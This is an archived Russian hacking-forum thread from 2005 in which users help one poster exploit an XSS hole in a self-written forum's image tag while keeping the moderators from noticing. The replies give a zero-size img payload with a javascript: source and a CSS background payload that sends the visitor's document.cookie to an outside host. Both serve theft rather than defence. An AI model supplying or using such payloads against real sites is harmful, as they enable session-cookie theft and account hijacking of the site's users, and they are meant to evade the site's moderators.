Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS в теге <img> (https://forum.antichat.xyz/showthread.php?t=10511)

Xex 04.11.2005 03:05
XSS в теге <img>
 
Ребят нашел XSS в теге img, примерно так:
<img src="javascript:alert()">
но вот незадача, при отображении на форуме остается значек незагруженной картинки, мне кажется что это особо пытливых модеров заитересует...как мне "<img src="javascript:alert()">"
после выполнения скрипта присвоить реальную картинку?...document.image[0].src не катит ибо не знаю номер моей картинки в массиве image[]...

max_pain89 04.11.2005 11:41
скажи форум, может можно придумать что-то

My-Ice 04.11.2005 12:14
А там можно сделать перенаправление на картинку с другого сайта?

Xex 04.11.2005 12:45
Цитата:
Сообщение от max_pain89
скажи форум, может можно придумать что-то
Форум самописаный...
Цитата:
Сообщение от My-Ice
А там можно сделать перенаправление на картинку с другого сайта?
Можно....

PSalm69 04.11.2005 14:32
Цитата:
Сообщение от Xex
Ребят нашел XSS в теге img, примерно так:
<img src="javascript:alert()">
но вот незадача, при отображении на форуме остается значек незагруженной картинки, мне кажется что это особо пытливых модеров заитересует...как мне "<img src="javascript:alert()">"
после выполнения скрипта присвоить реальную картинку?...document.image[0].src не катит ибо не знаю номер моей картинки в массиве image[]...
<img src="javascript :alert()" width=0 height=0> Из этого и делай свой код.
Ешё можно использовать скрипт в STYLE примерно таким образом

Код:
style=display:none;background:url(javascript:ANTICHAT.src='http://antichat.ru/cg-bin/s.gif?'+document.cookie);name=ANTICHAT
почти всё что связано с реализацией XSS можно найти тут http://www.antichat.ru/crackchat/HTML/


Время: 03:15